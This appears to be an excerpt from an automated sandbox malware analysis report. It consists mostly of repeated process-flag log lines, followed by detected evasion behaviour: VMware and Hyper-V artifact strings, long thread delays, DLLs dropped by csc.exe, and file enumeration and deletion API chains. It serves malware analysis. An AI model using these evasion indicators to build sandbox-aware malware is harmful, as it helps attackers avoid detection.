                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: RuntimeBroker.exe, 0000002E.00000000.995808507.000001B4F862A000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\MSTRACER.DLLCR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4875
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4340
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4102
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4861
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457A5F6 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_0457A5F6
                      Source: explorer.exe, 0000001C.00000000.916169591.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RuntimeBroker.exe, 00000030.00000000.1053923810.000001DA49E59000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001C.00000000.916169591.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RuntimeBroker.exe, 0000002E.00000000.995808507.000001B4F862A000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ll
                      Source: loaddll32.exe, 00000000.00000003.884544314.0000000001342000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: loaddll32.exe, 00000000.00000003.884544314.0000000001342000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWen-USn
                      Source: explorer.exe, 0000001C.00000000.881750747.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                      Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                      Source: RuntimeBroker.exe, 00000025.00000000.976191564.0000027D4E762000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
                      Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                      Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457CC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,0_2_0457CC4A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_0457198F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04580BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_04580BC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BBCC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_04BBCC4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_04BB198F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BC0BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_04BC0BC5
